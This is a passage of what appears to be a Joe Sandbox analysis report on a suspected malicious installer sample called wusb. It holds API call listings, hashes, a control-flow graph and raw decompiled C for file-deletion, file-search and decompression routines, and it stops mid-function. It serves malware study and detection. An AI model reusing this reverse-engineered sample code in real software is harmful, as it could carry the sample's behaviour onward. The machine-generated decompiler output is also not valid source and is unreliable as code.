                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054D2
                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054E5
                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004054F3
                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405506
                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405528
                                                        • ShowWindow.USER32(?,00000008), ref: 0040553C
                                                        • GetDlgItem.USER32 ref: 0040555D
                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040556D
                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405586
                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405592
                                                        • GetDlgItem.USER32 ref: 0040546B
                                                          • Part of subcall function 00404216: SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                                        • GetDlgItem.USER32 ref: 004055AF
                                                        • CreateThread.KERNELBASE ref: 004055BD
                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004055C4
                                                        • ShowWindow.USER32(00000000), ref: 004055E8
                                                        • ShowWindow.USER32(?,00000008), ref: 004055ED
                                                        • ShowWindow.USER32(00000008), ref: 00405637
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566B
                                                        • CreatePopupMenu.USER32 ref: 0040567C
                                                        • AppendMenuW.USER32 ref: 00405690
                                                        • GetWindowRect.USER32 ref: 004056B0
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056C9
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405701
                                                        • OpenClipboard.USER32(00000000), ref: 00405711
                                                        • EmptyClipboard.USER32 ref: 00405717
                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405723
                                                        • GlobalLock.KERNEL32 ref: 0040572D
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405741
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405761
                                                        • SetClipboardData.USER32 ref: 0040576C
                                                        • CloseClipboard.USER32 ref: 00405772
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                        • String ID: {$6B
                                                        • API String ID: 4154960007-3705917127
                                                        • Opcode ID: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
                                                        • Instruction ID: d3ec127817543c8dcb48433ae4040966c093085d210dffb8a3526856162b3191
                                                        • Opcode Fuzzy Hash: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
                                                        • Instruction Fuzzy Hash: B1B14A70900609FFDB119FA1DD89AAE7B79FB44354F00403AFA45B61A0CB754E52DF68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040595A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 499 40595a-405980 call 405c25 502 405982-405994 DeleteFileW 499->502 503 405999-4059a0 499->503 504 405b16-405b1a 502->504 505 4059a2-4059a4 503->505 506 4059b3-4059c3 call 40624c 503->506 507 405ac4-405ac9 505->507 508 4059aa-4059ad 505->508 512 4059d2-4059d3 call 405b69 506->512 513 4059c5-4059d0 lstrcatW 506->513 507->504 511 405acb-405ace 507->511 508->506 508->507 514 405ad0-405ad6 511->514 515 405ad8-405ae0 call 40658f 511->515 516 4059d8-4059dc 512->516 513->516 514->504 515->504 523 405ae2-405af6 call 405b1d call 405912 515->523 519 4059e8-4059ee lstrcatW 516->519 520 4059de-4059e6 516->520 522 4059f3-405a0f lstrlenW FindFirstFileW 519->522 520->519 520->522 524 405a15-405a1d 522->524 525 405ab9-405abd 522->525 539 405af8-405afb 523->539 540 405b0e-405b11 call 4052b0 523->540 528 405a3d-405a51 call 40624c 524->528 529 405a1f-405a27 524->529 525->507 527 405abf 525->527 527->507 541 405a53-405a5b 528->541 542 405a68-405a73 call 405912 528->542 532 405a29-405a31 529->532 533 405a9c-405aac FindNextFileW 529->533 532->528 538 405a33-405a3b 532->538 533->524 537 405ab2-405ab3 FindClose 533->537 537->525 538->528 538->533 539->514 543 405afd-405b0c call 4052b0 call 406012 539->543 540->504 541->533 544 405a5d-405a66 call 40595a 541->544 552 405a94-405a97 call 4052b0 542->552 553 405a75-405a78 542->553 543->504 544->533 552->533 556 405a7a-405a8a call 4052b0 call 406012 553->556 557 405a8c-405a92 553->557 556->533 557->533
                                                        C-Code - Quality: 98%
                                                        			E0040595A(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405C25(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2a8 =  *0x42a2a8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040624C(0x4256f0, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405B69(_t68);
					} else {
						lstrcatW(0x4256f0, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x4256f0,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040624C(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405912(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004052B0(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2a8 =  *0x42a2a8 + 1;
										} else {
											E004052B0(0xfffffff1, _t68);
											E00406012(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040595A(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x4256f0 - 0x5c;
					if( *0x4256f0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040658F(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405B1D(_t68);
							_t38 = E00405912(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004052B0(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004052B0(0xfffffff1, _t68);
							return E00406012(_t67, _t68, 0);
						}
						L30:
						 *0x42a2a8 =  *0x42a2a8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                        0x00405964
                                                        0x00405969
                                                        0x00405972
                                                        0x00405975
                                                        0x0040597d
                                                        0x00405980
                                                        0x00405983
                                                        0x0040598b
                                                        0x0040598d
                                                        0x0040598e
                                                        0x00000000
                                                        0x0040598e
                                                        0x00405999
                                                        0x0040599c
                                                        0x0040599c
                                                        0x0040599c
                                                        0x004059a0
                                                        0x004059b3
                                                        0x004059ba
                                                        0x004059bf
                                                        0x004059c3
                                                        0x004059d3
                                                        0x004059c5
                                                        0x004059cb
                                                        0x004059cb
                                                        0x004059d8
                                                        0x004059dc
                                                        0x004059e8
                                                        0x004059ee
                                                        0x004059f3
                                                        0x004059f9
                                                        0x00405a04
                                                        0x00405a0a
                                                        0x00405a0c
                                                        0x00405a0f
                                                        0x00405ab9
                                                        0x00405ab9
                                                        0x00405abd
                                                        0x00405abf
                                                        0x00405abf
                                                        0x00405abf
                                                        0x00405abf
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405a15
                                                        0x00405a15
                                                        0x00405a15
                                                        0x00405a1d
                                                        0x00405a3d
                                                        0x00405a45
                                                        0x00405a4a
                                                        0x00405a51
                                                        0x00405a6c
                                                        0x00405a71
                                                        0x00405a73
                                                        0x00405a97
                                                        0x00405a75
                                                        0x00405a75
                                                        0x00405a78
                                                        0x00405a8c
                                                        0x00405a7a
                                                        0x00405a7d
                                                        0x00405a85
                                                        0x00405a85
                                                        0x00405a78
                                                        0x00405a53
                                                        0x00405a59
                                                        0x00405a5b
                                                        0x00405a61
                                                        0x00405a61
                                                        0x00405a5b
                                                        0x00000000
                                                        0x00405a51
                                                        0x00405a1f
                                                        0x00405a27
                                                        0x00000000
                                                        0x00000000
                                                        0x00405a29
                                                        0x00405a31
                                                        0x00000000
                                                        0x00000000
                                                        0x00405a33
                                                        0x00405a3b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405a9c
                                                        0x00405aa4
                                                        0x00405aaa
                                                        0x00405aaa
                                                        0x00405ab3
                                                        0x00000000
                                                        0x00405ab3
                                                        0x004059de
                                                        0x004059e6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004059a2
                                                        0x004059a2
                                                        0x004059a4
                                                        0x00405ac4
                                                        0x00405ac6
                                                        0x00405ac9
                                                        0x00405b1a
                                                        0x00405b1a
                                                        0x00405b1a
                                                        0x00405acb
                                                        0x00405ace
                                                        0x00405ad9
                                                        0x00405ade
                                                        0x00405ae0
                                                        0x00000000
                                                        0x00000000
                                                        0x00405ae3
                                                        0x00405aef
                                                        0x00405af4
                                                        0x00405af6
                                                        0x00000000
                                                        0x00405b11
                                                        0x00405af8
                                                        0x00405afb
                                                        0x00000000
                                                        0x00000000
                                                        0x00405b00
                                                        0x00000000
                                                        0x00405b07
                                                        0x00405ad0
                                                        0x00405ad0
                                                        0x00000000
                                                        0x00405ad0
                                                        0x004059aa
                                                        0x004059ad
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004059ad

                                                        APIs
                                                        • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,766DFAA0,00000000), ref: 00405983
                                                        • lstrcatW.KERNEL32(Unthinkingly\lagerbeholdnings\Bureauchef\Smaaskndt.Cri,\*.*), ref: 004059CB
                                                        • lstrcatW.KERNEL32(?,0040A014), ref: 004059EE
                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,Unthinkingly\lagerbeholdnings\Bureauchef\Smaaskndt.Cri,?,?,C:\Users\user\AppData\Local\Temp\,766DFAA0,00000000), ref: 004059F4
                                                        • FindFirstFileW.KERNELBASE(Unthinkingly\lagerbeholdnings\Bureauchef\Smaaskndt.Cri,?,?,?,0040A014,?,Unthinkingly\lagerbeholdnings\Bureauchef\Smaaskndt.Cri,?,?,C:\Users\user\AppData\Local\Temp\,766DFAA0,00000000), ref: 00405A04
                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AA4
                                                        • FindClose.KERNEL32(00000000), ref: 00405AB3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                        • String ID: "C:\Users\Public\wusb.bat" $C:\Users\user\AppData\Local\Temp\$Unthinkingly\lagerbeholdnings\Bureauchef\Smaaskndt.Cri$\*.*
                                                        • API String ID: 2035342205-2520913472
                                                        • Opcode ID: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
                                                        • Instruction ID: a8a76f5088e9b8e84a0c744efebc89a786f36fdc765849bba2b15b9d7042df22
                                                        • Opcode Fuzzy Hash: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
                                                        • Instruction Fuzzy Hash: BA41E230A01A14AACB21BB658C89ABF7778EF81764F50427FF801711D1D77C5982DEAE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040658F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0040658F(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426738); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426738;
			}




                                                        0x0040659a
                                                        0x004065a3
                                                        0x00000000
                                                        0x004065b0
                                                        0x004065a6
                                                        0x00000000

                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,00426738,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,00405C6E,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,C:\Users\user\AppData\Local\Temp\nsr743A.tmp,?,?,766DFAA0,0040597A,?,C:\Users\user\AppData\Local\Temp\,766DFAA0), ref: 0040659A
                                                        • FindClose.KERNEL32(00000000), ref: 004065A6
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\nsr743A.tmp, xrefs: 0040658F
                                                        • 8gB, xrefs: 00406590
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID: 8gB$C:\Users\user\AppData\Local\Temp\nsr743A.tmp
                                                        • API String ID: 2295610775-2807737870
                                                        • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                        • Instruction ID: 94cc43f68e1cdd1d7b1eae1ec77a84073341a0d38183f0b632eac2f66d480838
                                                        • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                        • Instruction Fuzzy Hash: 5DD01231509020ABC20157387D0C85BBA5C9F55331B129A37B466F52E4D7348C6286AC
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406956 Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 98%
                                                        			E00406956() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
